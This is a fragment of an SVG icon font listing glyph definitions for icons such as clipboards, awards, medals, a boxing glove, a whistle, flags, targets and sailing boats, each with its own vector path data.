<glyph unicode="&#xeaa8;" glyph-name="clipboard-move" d="M672 222.4v0 0c36.516-7.412 64-39.696 64-78.4 0-44.183-35.817-80-80-80s-80 35.817-80 80c0 38.703 27.484 70.987 64 78.4v74.973l-256 256v-105.373h-32v160h160v-32h-105.652l265.652-267.991v-85.609zM416 249.373l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM672 505.373l-56.569-56.569-22.627 22.627 56.569 56.569-56.569 56.569 22.627 22.627 56.569-56.569 56.569 56.569 22.627-22.627-56.569-56.569 56.569-56.569-22.627-22.627-56.569 56.569zM448 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM416 832h-31.912c-35.343 0-64.004-28.521-64.088-64h-32.083c-35.301 0-63.918-28.472-63.918-64.115v-671.77c0-35.41 28.51-64.115 63.918-64.115h480.165c35.301 0 63.918 28.472 63.918 64.115v671.77c0 35.41-28.51 64.115-63.918 64.115h-32.083c-0.084 35.361-28.645 64-64.088 64h-31.912c-0.029 53.024-43.207 96-96.296 96h-31.408c-53.165 0-96.267-42.82-96.296-96v0 0zM736 736h32.001c17.448 0 31.999-14.371 31.999-32.098v-671.803c0-18.053-14.326-32.098-31.999-32.098h-480.003c-17.448 0-31.999 14.371-31.999 32.098v671.803c0 18.053 14.326 32.098 31.999 32.098h32.001c0.084-35.361 28.645-64 64.088-64h287.823c35.343 0 64.004 28.521 64.088 64v0 0zM528 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0zM656 96c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xeaa9;" glyph-name="clipboard-move2" d="M448 800v32.067c0 35.189 28.724 63.933 64.156 63.933h31.688c35.551 0 64.156-28.624 64.156-63.933v-32.067h64.142c17.624 0 31.858-14.312 31.858-31.967v-32.067c0-17.801-14.264-31.967-31.858-31.967h-288.283c-17.624 0-31.858 14.312-31.858 31.967v32.067c0 17.801 14.264 31.967 31.858 31.967h64.142zM736 768h32.083c35.408 0 63.918-28.705 63.918-64.115v-671.77c0-35.643-28.617-64.115-63.918-64.115h-480.165c-35.408 0-63.918 28.705-63.918 64.115v671.77c0 35.643 28.617 64.115 63.918 64.115h32.083c0-0.052 0-0.104 0-0.156v-31.688c0-35.432 28.593-64.156 64.088-64.156h287.823c35.395 0 64.088 28.605 64.088 64.156v31.688c0 0.052 0 0.104 0 0.156v0 0zM672 190.4v85.609l-265.652 267.991h105.652v32h-160v-160h32v105.373l256-256v-74.973c-36.516-7.412-64-39.696-64-78.4 0-44.183 35.817-80 80-80s80 35.817 80 80c0 38.703-27.484 70.987-64 78.4v0 0zM416 217.373l56.569-56.569 22.627 22.627-56.569 56.569 56.569 56.569-22.627 22.627-56.569-56.569-56.569 56.569-22.627-22.627 56.569-56.569-56.569-56.569 22.627-22.627 56.569 56.569zM672 473.373l56.569-56.569 22.627 22.627-56.569 56.569 56.569 56.569-22.627 22.627-56.569-56.569-56.569 56.569-22.627-22.627 56.569-56.569-56.569-56.569 22.627-22.627 56.569 56.569zM656 64c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM528 800c8.837 0 16 7.163 16 16s-7.163 16-16 16c-8.837 0-16-7.163-16-16s7.163-16 16-16v0z" />
<glyph unicode="&#xeaaa;" glyph-name="award" d="M320 425.334v0 0c-58.92 52.735-96 129.37-96 214.666 0 159.058 128.942 288 288 288s288-128.942 288-288c0-85.296-37.080-161.931-96-214.666v-457.334l-192 192-192-192v457.334zM352 400.498v-355.697l160 160 160-160v355.697c-45.763-30.633-100.795-48.498-160-48.498s-114.237 17.865-160 48.498v0 0zM512 384c141.385 0 256 114.615 256 256s-114.615 256-256 256c-141.385 0-256-114.615-256-256s114.615-256 256-256v0zM512 448v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM512 480c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeaab;" glyph-name="award2" d="M320 383.977v-415.977l192 192 192-192v415.977c-53.482-40.172-119.961-63.977-192-63.977s-138.518 23.804-192 63.977v0 0zM512 352v0c-159.058 0-288 128.942-288 288s128.942 288 288 288c159.058 0 288-128.942 288-288s-128.942-288-288-288zM512 448c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0zM512 480c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeaac;" glyph-name="award3" d="M320 425.334v0 0c-58.92 52.735-96 129.37-96 214.666 0 159.058 128.942 288 288 288s288-128.942 288-288c0-85.296-37.080-161.931-96-214.666v-457.334l-192 192-192-192v457.334zM352 400.498v-355.697l160 160 160-160v355.697c-45.763-30.633-100.795-48.498-160-48.498s-114.237 17.865-160 48.498v0 0zM512 384c141.385 0 256 114.615 256 256s-114.615 256-256 256c-141.385 0-256-114.615-256-256s114.615-256 256-256v0zM512 553.846l-112-73.846 48 128-96 64h112l48 128 48-128h112l-96-64 48-128-112 73.846z" />
<glyph unicode="&#xeaad;" glyph-name="award4" d="M320 383.977v-415.977l192 192 192-192v415.977c-53.482-40.172-119.961-63.977-192-63.977s-138.518 23.804-192 63.977v0 0zM512 352c159.058 0 288 128.942 288 288s-128.942 288-288 288c-159.058 0-288-128.942-288-288s128.942-288 288-288v0zM512 553.846l-112-73.846 48 128-96 64h112l48 128 48-128h112l-96-64 48-128-112 73.846z" />
<glyph unicode="&#xeaae;" glyph-name="award5" d="M512.231 320.001l-140.984-367.275-55.22 124.027-124.027-55.22 139.295 362.876c-64.959 52.806-106.462 133.352-106.462 223.591 0 159.058 128.942 288 288 288s288-128.942 288-288c0-90.239-41.503-170.785-106.462-223.591l139.295-362.876-124.027 55.22-55.22-124.027-140.984 367.275c-0.201 0-0.402-0.001-0.603-0.001s-0.402 0-0.603 0.001v0 0zM478.722 321.999v0 0c-43.999 5.192-84.96 20.303-120.587 43.034l-108.737-283.27 82.685 36.814 36.814-82.685 109.826 286.107zM667.533 365.033v0 0c-35.627-22.731-76.589-37.842-120.587-43.034l109.826-286.107 36.814 82.685 82.685-36.814-108.737 283.27zM512.834 352c141.385 0 256 114.615 256 256s-114.615 256-256 256c-141.385 0-256-114.615-256-256s114.615-256 256-256v0zM512.834 416v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM512.834 448c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeaaf;" glyph-name="award6" d="M500.044 288.251l-128.796-335.525-55.22 124.027-124.027-55.22 127.293 331.609c50.579-38.469 112.955-62.225 180.751-64.89v0zM706.375 353.141l127.293-331.609-124.027 55.22-55.22-124.027-128.796 335.525c67.795 2.665 130.172 26.421 180.751 64.89v0 0zM512.834 320v0c-159.058 0-288 128.942-288 288s128.942 288 288 288c159.058 0 288-128.942 288-288s-128.942-288-288-288zM512.834 416c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0zM512.834 448c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeab0;" glyph-name="award7" d="M512.231 320.001l-140.984-367.275-55.22 124.027-124.027-55.22 139.295 362.876c-64.959 52.806-106.462 133.352-106.462 223.591 0 159.058 128.942 288 288 288s288-128.942 288-288c0-90.239-41.503-170.785-106.462-223.591l139.295-362.876-124.027 55.22-55.22-124.027-140.984 367.275c-0.201 0-0.402-0.001-0.603-0.001s-0.402 0-0.603 0.001v0 0zM478.722 321.999v0 0c-43.999 5.192-84.96 20.303-120.587 43.034l-108.737-283.27 82.685 36.814 36.814-82.685 109.826 286.107zM667.533 365.033v0 0c-35.627-22.731-76.589-37.842-120.587-43.034l109.826-286.107 36.814 82.685 82.685-36.814-108.737 283.27zM512.834 352c141.385 0 256 114.615 256 256s-114.615 256-256 256c-141.385 0-256-114.615-256-256s114.615-256 256-256v0zM512.834 521.846l-112-73.846 48 128-96 64h112l48 128 48-128h112l-96-64 48-128-112 73.846z" />
<glyph unicode="&#xeab1;" glyph-name="award8" d="M500.044 288.251l-128.796-335.525-55.22 124.027-124.027-55.22 127.293 331.609c50.579-38.469 112.955-62.225 180.751-64.89v0zM706.375 353.141l127.293-331.609-124.027 55.22-55.22-124.027-128.796 335.525c67.795 2.665 130.172 26.421 180.751 64.89v0 0zM512.834 320c159.058 0 288 128.942 288 288s-128.942 288-288 288c-159.058 0-288-128.942-288-288s128.942-288 288-288v0zM512.834 521.846l-112-73.846 48 128-96 64h112l48 128 48-128h112l-96-64 48-128-112 73.846z" />
<glyph unicode="&#xeab2;" glyph-name="medal5" d="M488.066 556.621v0 0c7.534 0.591 15.15 0.892 22.837 0.892 7.592 0 15.116-0.294 22.561-0.871l150.038 371.357 29.621-11.968-146.989-363.809c43.266-8.403 83.074-26.492 117.076-51.919l148.592 367.778 29.719-12.007-152.524-377.509c55.371-52.486 89.906-126.736 89.906-209.053 0-159.058-128.942-288-288-288s-288 128.942-288 288c0 82.214 34.449 156.382 89.7 208.857l-152.603 377.705 29.67 11.987 148.663-367.955c33.976 25.468 73.766 43.602 117.021 52.054l-147.005 363.851 29.67 11.987 150.047-371.379zM510.903 13.514c141.385 0 256 114.615 256 256s-114.615 256-256 256c-141.385 0-256-114.615-256-256s114.615-256 256-256v0zM510.903 77.514v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM510.903 109.514c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeab3;" glyph-name="medal6" d="M545.976 587.614l137.525 340.386 178.019-71.924-139.74-345.869c-48.049 42.131-108.822 70.105-175.804 77.407v0 0zM299.815 510.022l-139.815 346.053 178.019 71.924 137.537-340.416c-66.972-7.359-127.725-35.385-175.742-77.561v0 0zM510.903-18.486v0c-159.058 0-288 128.942-288 288s128.942 288 288 288c159.058 0 288-128.942 288-288s-128.942-288-288-288zM510.903 77.514c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0zM510.903 109.514c88.366 0 160 71.634 160 160s-71.634 160-160 160c-88.366 0-160-71.634-160-160s71.634-160 160-160v0z" />
<glyph unicode="&#xeab4;" glyph-name="medal7" d="M488.066 556.621v0 0c7.534 0.591 15.15 0.892 22.837 0.892 7.592 0 15.116-0.294 22.561-0.871l150.038 371.357 29.621-11.968-146.989-363.809c43.266-8.403 83.074-26.492 117.076-51.919l148.592 367.778 29.719-12.007-152.524-377.509c55.371-52.486 89.906-126.736 89.906-209.053 0-159.058-128.942-288-288-288s-288 128.942-288 288c0 82.214 34.449 156.382 89.7 208.857l-152.603 377.705 29.67 11.987 148.663-367.955c33.976 25.468 73.766 43.602 117.021 52.054l-147.005 363.851 29.67 11.987 150.047-371.379zM510.903 13.514c141.385 0 256 114.615 256 256s-114.615 256-256 256c-141.385 0-256-114.615-256-256s114.615-256 256-256v0 0zM510.903 183.36l-112-73.846 48 128-96 64h112l48 128 48-128h112l-96-64 48-128-112 73.846z" />
<glyph unicode="&#xeab5;" glyph-name="medal8" d="M545.976 587.614l137.525 340.386 178.019-71.924-139.74-345.869c-48.049 42.131-108.822 70.105-175.804 77.407v0 0zM299.815 510.022l-139.815 346.053 178.019 71.924 137.537-340.416c-66.972-7.359-127.725-35.385-175.742-77.561v0 0zM510.903-18.486c159.058 0 288 128.942 288 288s-128.942 288-288 288c-159.058 0-288-128.942-288-288s128.942-288 288-288v0 0zM510.903 183.36l-112-73.846 48 128-96 64h112l48 128 48-128h112l-96-64 48-128-112 73.846z" />
<glyph unicode="&#xeab6;" glyph-name="boxing-glove" d="M415.471 542.456v0c1.293-0.46 2.677-0.947 4.147-1.459 11.754-4.093 24.609-8.191 38.123-12.012 23.103-6.533 45.659-11.558 66.666-14.481 13.233-1.842 25.571-2.803 36.831-2.803 29.268 0 59.639 6.001 89.198 16.031 10.395 3.527 19.927 7.303 28.367 11.066 4.983 2.222 8.432 3.912 10.121 4.805l14.963-28.286c-2.3-1.217-6.389-3.22-12.052-5.745-9.305-4.149-19.747-8.285-31.117-12.143-32.624-11.070-66.319-17.728-99.48-17.728-12.839 0-26.627 1.075-41.242 3.109-22.607 3.146-46.549 8.48-70.963 15.384-14.161 4.005-27.614 8.293-39.939 12.585-1.669 0.581-3.237 1.134-4.7 1.656-30.919 0.463-116.394-3.746-116.394-64.432 0-100.164 96-94.887 124.8-192h355.2v320.167c0 88.273-71.657 159.833-160.035 159.833h-31.93c-88.385 0-160.23-71.491-160.472-159.811l-0.092-33.734zM384 224c0 98.445-127.705 96-128 224-0.221 96 128 96 128 96v32.094c0 105.943 86.037 191.906 192.17 191.906h31.66c105.974 0 192.17-85.869 192.17-191.794v-416.206c0-35.593-28.693-64-64.088-64h-287.823c-35.495 0-64.088 28.654-64.088 64v64zM416 224v-64.033c0-17.655 14.235-31.967 31.858-31.967h288.283c17.595 0 31.858 14.165 31.858 31.967v64.033h-352zM448 192v-32h128v32h-128z" />
<glyph unicode="&#xeab7;" glyph-name="boxing-glove2" d="M256 448c0.259-112.354 98.684-124.204 122.742-192h421.258v320.206c0 105.925-86.195 191.794-192.17 191.794h-31.66c-106.132 0-192.17-85.964-192.17-191.906v-18.688c15.46-7.697 27.16-13.393 28.334-13.82 49.433-17.964 104.591-31.887 148.905-31.887 29.268 0 59.639 6.001 89.198 16.031 10.395 3.527 19.927 7.303 28.367 11.066 4.983 2.222 8.432 3.912 10.121 4.805l14.963-28.286c-2.3-1.217-6.389-3.22-12.052-5.745-9.305-4.149-19.747-8.285-31.117-12.143-32.624-11.070-66.319-17.728-99.48-17.728-49.064 0-107.115 14.654-159.834 33.812-3.025 1.099-13.361 6.133-32.161 15.495-7.276 3.625-14.391 7.187-21.481 10.75-38.037-7.619-91.905-29.503-91.762-91.756v0zM384 224h416v-64c0-35.593-28.693-64-64.088-64h-287.823c-35.495 0-64.088 28.654-64.088 64v64zM448 192v-32h128v32h-128z" />
<glyph unicode="&#xeab8;" glyph-name="whistle" d="M262.817 402.889v0 0c-10.767 8.225-24.221 13.111-38.817 13.111-35.346 0-64-28.654-64-64s28.654-64 64-64c14.595 0 28.050 4.886 38.817 13.111 22.302-81.341 96.763-141.111 185.183-141.111 106.039 0 192 85.961 192 192 0 13.801-1.456 27.262-4.223 40.238l260.223 55.762v96h-320v-64h-96v64h-32c-88.421 0-162.881-59.77-185.183-141.111zM608 512h256v-38.4l-269.152-57.971c8.461-19.501 13.152-41.017 13.152-63.629 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 77.326 54.854 141.84 127.772 156.753 10.41 2.129 21.188 3.247 32.228 3.247v-64h160v64zM224 384v0c17.796 0 32-14.327 32-32 0-17.796-14.327-32-32-32-17.796 0-32 14.327-32 32 0 17.796 14.327 32 32 32zM512 736v-128h32v128h-32zM675.83 703.328l-67.83-108.55 27.138-16.957 67.83 108.55-27.138 16.957zM379.138 703.328l67.83-108.55-27.138-16.957-67.83 108.55 27.138 16.957z" />
<glyph unicode="&#xeab9;" glyph-name="whistle2" d="M262.817 402.889c22.302 81.341 96.763 141.111 185.183 141.111h32v-64h96v64h320v-96l-260.223-55.762c2.767-12.976 4.223-26.437 4.223-40.238 0-106.039-85.961-192-192-192-88.421 0-162.881 59.77-185.183 141.111-10.767-8.225-24.221-13.111-38.817-13.111-35.346 0-64 28.654-64 64s28.654 64 64 64c14.595 0 28.050-4.886 38.817-13.111v0 0zM224 384c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM512 736v-128h32v128h-32zM675.83 703.328l-67.83-108.55 27.138-16.957 67.83 108.55-27.138 16.957zM379.138 703.328l67.83-108.55-27.138-16.957-67.83 108.55 27.138 16.957z" />
<glyph unicode="&#xeaba;" glyph-name="volleyball-water" d="M175.663 209.012l15.333 7.423c-39.875 62.21-62.997 136.187-62.997 215.565 0 220.914 179.086 400 400 400s400-179.086 400-400c0-93.013-31.747-178.61-84.996-246.549-2.672-1.15 4.107 1.733 10.123 4.54 18.325 8.55 36.299 18.743 53.899 30.427 19.937 13.236 37.673 27.41 52.974 41.57v-42.314c-10.914-8.854-22.684-17.557-35.275-25.916-115.906-76.948-248.908-94.638-389.235-15.704-128.701 72.394-258.077 56.001-378.147-15.654-22.804-13.609-43.3-28.192-61.139-42.753-0.068-0.055-0.203 40.343-0.203 40.343 13.836 10.221 28.847 20.282 44.944 29.888 10.573 6.31 21.227 12.223 31.956 17.718 0.958 0.491 2.764 1.415 2.764 1.415v0zM346.277 256.583v0c-5.272-0.261 4.289 0.328 14.371 0.427 62.896 0.618 126.816-15.226 190.53-51.065 0.704-0.396 2.006-1.086 3.705-1.97 67.232 54.652 122.173 126.042 157.715 210.857-54.977 20.518-114.292 32.136-176.193 33.102-48.484-81.061-114.379-145.52-190.128-191.351zM782.037 165.749c39.226 37.437 70.191 83.455 89.883 135.041 3.342 8.755 6.676 18.98 5.403 15.145-39.859 35.193-85.073 64.461-134.263 86.426-35.671-85.245-89.813-157.716-156.018-214.423-0.308 0.136-0.617 0.273-0.925 0.41 62.2-27.671 122.315-34.916 179.692-25.668 8.679 1.399 19.443 3.766 16.229 3.068v0zM525.624 32.007c0.791-0.005 1.583-0.007 2.376-0.007 0.796 0 1.592 0.002 2.387 0.007h-4.763zM249.184 672.187v0 0c2.237 2.594-9.591-11.249-17.059-21.329-45.321-61.169-72.125-136.883-72.125-218.859 0-59.182 13.97-115.1 38.793-164.638 7.553-15.074 21.495-37.305 19.516-34.229 52.826 17.058 103.055 42.424 148.545 75.521-82.326 107.864-120.9 236.472-117.67 363.534zM284.223 707.68c-12.112-131.273 23.281-266.886 108.627-378.836 44.962 37.242 84.431 82.602 116.052 135.448-57.245 102.783-78.677 216.081-68.21 325.289 2.427 0.59-10.191-2.522-18.75-5.094-42.471-12.761-81.71-32.988-116.194-59.156-11.83-8.977-25.685-21.331-21.526-17.65v0 0zM857.965 595.117v0 0c1.013-2.045-8.812 17.167-15.589 28.274-64.614 105.907-181.238 176.609-314.376 176.609-10.128 0-20.161-0.409-30.082-1.212-10.94-0.885-27.059-3.188-24.377-2.79-4.301-37.741-4.558-76.059-0.586-114.271 139.273 18.089 274.379-15.522 385.010-86.61zM880.167 539.116c-110.741 86.093-254.243 129.228-402.784 109.995 9.717-57.884 29.315-115.076 59.436-169.179 133.094-2.055 254.923-50.541 350.002-129.975-0.598-2.625 3.21 14.65 4.965 26.173 2.775 18.218 4.214 36.876 4.214 55.87 0 30.448-3.698 60.033-10.669 88.329-3.248 13.185-7.202 25.498-5.164 18.787v0 0zM191.334 120.591c114.937 53.286 237.769 58.021 359.844-10.646 111.406-62.666 216.668-59.066 312.156-11.004v-35.491c-100.57-45.867-211.698-46.727-327.844 18.605-116.641 65.61-233.836 58.293-344.156 3.007v35.53z" />
<glyph unicode="&#xeabb;" glyph-name="volleyball-water2" d="M635.378 234.506c44.362 48.056 81.137 104.418 107.682 167.855 59.989-26.786 114.064-64.435 159.724-110.446 0.912 2.439-2.539-6.804-5.434-13.745-80.474-50.522-168.58-69.773-261.972-43.664v0 0zM600.999 246.1c46.333 47.511 84.574 104.241 111.599 168.733-54.977 20.518-114.292 32.136-176.193 33.102-30.399-50.823-67.641-95.121-109.866-132.392 41.406-7.341 83.066-22.212 124.639-45.597 16.75-9.422 33.361-17.346 49.821-23.846v0 0zM357.708 320.969c-86.412 119.631-120.593 263.059-105.094 401.139 1.123 1.066-13.75-13.446-21.745-22.311-63.942-70.901-102.868-164.803-102.868-267.797 0-58.934 12.745-114.89 35.629-165.264 62.568 33.579 127.742 53.041 194.078 54.234v0 0zM921.647 503.392c-114.984 109.544-276.406 167.453-444.264 145.719 9.717-57.884 29.315-115.076 59.436-169.179 146.035-2.255 278.508-60.409 376.964-154.009-0.548-1.996 2.817 10.478 4.68 18.855 6.244 28.077 9.537 57.265 9.537 87.222 0 15.363-0.866 30.524-2.552 45.436-1.847 16.337-5.141 33.396-3.8 25.956v0zM907.173 559.731c-118.402 94.921-273.537 142.866-434.217 121.997-5.133 49.389-3.204 98.954 5.394 147.221-1.641-0.203 5.747 0.706 11.124 1.22 12.679 1.212 25.53 1.831 38.527 1.831 167.707 0 311.309-103.209 370.752-249.577 4.615-11.363 9.774-26.715 8.42-22.693v0zM290.482 753.879c-26.022-145.169 6.96-299.888 102.367-425.035 44.962 37.242 84.431 82.602 116.052 135.448-63.175 113.43-82.733 239.666-63.934 359.079 1.010 0.213-5.644-1.209-9.942-2.232-45.316-10.787-87.643-29.285-125.517-54.029-9.076-5.93-21.519-15.074-19.025-13.23v0zM96 159.991c13.836 10.221 28.847 20.282 44.944 29.888 129.022 76.997 270.126 94.877 410.234 16.066 128.678-72.381 249.158-56.356 355.848 14.473 19.937 13.236 37.673 27.41 52.974 41.57v-42.314c-10.914-8.854-22.684-17.557-35.275-25.916-115.906-76.948-248.908-94.638-389.235-15.704-128.701 72.394-258.077 56.001-378.147-15.654-22.804-13.609-43.3-28.192-61.139-42.753-0.068-0.055-0.136-0.111-0.203-0.166v40.509zM191.334 120.591c114.937 53.286 237.769 58.021 359.844-10.646 111.406-62.666 216.668-59.066 312.156-11.004v-35.491c-100.57-45.867-211.698-46.727-327.844 18.605-116.641 65.61-233.836 58.293-344.156 3.007v35.53z" />
<glyph unicode="&#xeabc;" glyph-name="checkered-flag" d="M768.562 402.667c0 0-57.8-29.279-147.495-14.722-6.211 1.008-15.166 3.096-13.068 2.667v127.851c-25.751 4.628-53.432 12.638-82.119 25.556-27.78 12.51-53.882 20.608-77.881 25.551v-127.303c3.321-0.592-4.299 0.157-11.638 1.198-83.25 11.807-148.362-9.276-148.362-9.276v128.637c0.004 0.001 71.281 23.257 160 7.44v127.303c-97.262 20.031-159.996-11.762-160-11.764v127.188c0 0 62.729 31.549 160 11.726v-126.453c25.643-4.571 52.743-12.407 80-25.012 28.518-13.187 55.348-21.604 80-26.643v127.362c92.73-16.643 160.562 10.22 160.562 10.22v-129.264c-0.36 1.217-0.562 1.888-0.562 1.888-0.004-0.002-67.573-26.964-160-10.354v-127.851c22.708-4.642 43.568-6.418 62.197-6.418 60.769 0 97.8 18.902 97.803 18.904l0.562-128.431zM256 32.194h32v366.565c44.073 15.856 130.577 33.089 240-14.565 160.725-69.996 272 0 272 0v448c0 0-111.24-71.563-272 0s-272 0-272 0v-800z" />
<glyph unicode="&#xeabd;" glyph-name="checkered-flag2" d="M608 773.975v-127.362c96.781-19.784 159.996 12.483 160 12.485l0.562 0.46v-130.74h-0.562c-0.004-0.002-67.573-26.964-160-10.354v-128.125c-24.578 5.015-51.312 13.359-79.719 26.394-27.356 12.553-54.553 20.345-80.281 24.882v127.956c-97.262 20.031-159.996-11.762-160-11.764v133.020c0.004 0.001 71.281 23.257 160 7.44v126.453c24.079-4.907 50.275-12.962 78.16-25.423 28.581-12.772 56.165-20.715 81.84-25.323zM256 576.194v-544h32v366.565c44.073 15.856 130.577 33.089 240-14.565 160.725-69.996 272 0 272 0v448c0 0-111.24-71.563-272 0s-272 0-272 0v-256zM448 697.571v0 0c24-4.943 50.101-13.041 77.881-25.551 28.687-12.918 56.367-20.928 82.119-25.556v-127.851c-24.652 5.039-51.482 13.456-80 26.643-27.257 12.605-54.357 20.44-80 25.012v127.303z" />
<glyph unicode="&#xeabe;" glyph-name="target-arrow" d="M288 199.326l-32-32v-103.326h-32v71.326l-41.373-41.373-22.627 22.627 43.419 43.419h-75.419v32h107.419l32 32h-75.419v32h107.419l170.29 170.29-21.71 21.71 96 32-32-96-19.663 19.663-172.337-172.337v-103.326h-32v71.326zM248.926 288c-36.003 55.218-56.926 121.166-56.926 192 0 194.404 157.596 352 352 352s352-157.596 352-352c0-194.404-157.596-352-352-352-70.834 0-136.782 20.923-192 56.926v34.298l2.727 2.727c53.007-38.945 118.454-61.951 189.273-61.951 176.731 0 320 143.269 320 320s-143.269 320-320 320c-176.731 0-320-143.269-320-320 0-71.278 23.304-137.113 62.71-190.302l-1.698-1.698h-36.085zM448.106 475.459c-0.070 1.505-0.106 3.019-0.106 4.541 0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96-1.522 0-3.036 0.035-4.541 0.106l9.031 31.608 0.476 0.476c33.026 2.534 59.034 30.135 59.034 63.81 0 35.346-28.654 64-64 64-33.793 0-61.469-26.191-63.836-59.382l-32.059-9.16zM355.676 358.665c-22.574 34.965-35.676 76.62-35.676 121.335 0 123.712 100.288 224 224 224s224-100.288 224-224c0-123.712-100.288-224-224-224-44.252 0-85.507 12.832-120.246 34.978l23.275 23.275c28.459-16.686 61.598-26.252 96.972-26.252 106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192 0-35.84 9.82-69.386 26.916-98.095l-23.24-23.24z" />
<glyph unicode="&#xeabf;" glyph-name="target-arrow2" d="M288 199.326l-32-32v-103.326h-32v71.326l-41.373-41.373-22.627 22.627 43.419 43.419h-75.419v32h107.419l32 32h-75.419v32h107.419l170.29 170.29-21.71 21.71 96 32-32-96-19.663 19.663-172.337-172.337v-103.326h-32v71.326zM248.926 288c-36.003 55.218-56.926 121.166-56.926 192 0 194.404 157.596 352 352 352s352-157.596 352-352c0-194.404-157.596-352-352-352-70.834 0-136.782 20.923-192 56.926v34.298l71.754 71.754c34.74-22.146 75.995-34.978 120.246-34.978 123.712 0 224 100.288 224 224s-100.288 224-224 224c-123.712 0-224-100.288-224-224 0-44.715 13.102-86.37 35.676-121.335l-70.665-70.665h-36.085zM495.899 363.123l-48.871-48.871c28.459-16.686 61.598-26.252 96.972-26.252 106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192 0-35.84 9.82-69.386 26.916-98.095v0l48.832 48.832-30.447 30.207 50.805 14.516c-0.070 1.505-0.106 3.019-0.106 4.541 0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96-1.522 0-3.036 0.035-4.541 0.106l-14.292-50.020-29.269 29.038zM548.618 416.164c33.19 2.367 59.382 30.043 59.382 63.836 0 35.346-28.654 64-64 64-33.793 0-61.469-26.191-63.836-59.382l95.836 27.382-27.382-95.836z" />
<glyph unicode="&#xeac0;" glyph-name="target3" d="M512 96v0c-194.404 0-352 157.596-352 352s157.596 352 352 352c194.404 0 352-157.596 352-352s-157.596-352-352-352zM512 128c176.731 0 320 143.269 320 320s-143.269 320-320 320c-176.731 0-320-143.269-320-320s143.269-320 320-320v0zM512 224v0c-123.712 0-224 100.288-224 224s100.288 224 224 224c123.712 0 224-100.288 224-224s-100.288-224-224-224zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0zM512 352v0c-53.019 0-96 42.981-96 96s42.981 96 96 96c53.019 0 96-42.981 96-96s-42.981-96-96-96zM512 384c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeac1;" glyph-name="target4" d="M512 96v0c-194.404 0-352 157.596-352 352s157.596 352 352 352c194.404 0 352-157.596 352-352s-157.596-352-352-352zM512 224c123.712 0 224 100.288 224 224s-100.288 224-224 224c-123.712 0-224-100.288-224-224s100.288-224 224-224v0zM512 256v0c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192zM512 352c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0zM512 384c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeac2;" glyph-name="sailing-boat" d="M229.439 224c13.127-37.286 48.584-64 90.565-64h415.992c41.785 0 77.335 26.761 90.526 64h-597.084zM544 256h320c0-70.549-57.299-128-127.98-128h-416.040c-70.685 0-127.98 57.308-127.98 128h320v480h32v-480zM864 288l-288 288v-288h288zM784 320h-176v176l176-176zM288 560v0c96 160 192 176 192 176s-32-112-32-256c0-144 32-192 32-192h-288c0 0 0 112 96 272zM300.697 518.111c-73.497-139.504-73.497-198.111-73.497-198.111h208c0 0-19.2 57.879-19.2 160s19.2 199.305 19.2 199.305c0 0-71.691-41.972-134.503-161.193v0z" />
<glyph unicode="&#xeac3;" glyph-name="sailing-boat2" d="M544 256h320c0-70.549-57.299-128-127.98-128h-416.040c-70.685 0-127.98 57.308-127.98 128h320v480h32v-480zM864 288h-288v288l288-288zM288 560c-96-160-96-272-96-272h288c0 0-32 48-32 192s32 256 32 256c0 0-96-16-192-176v0z" />
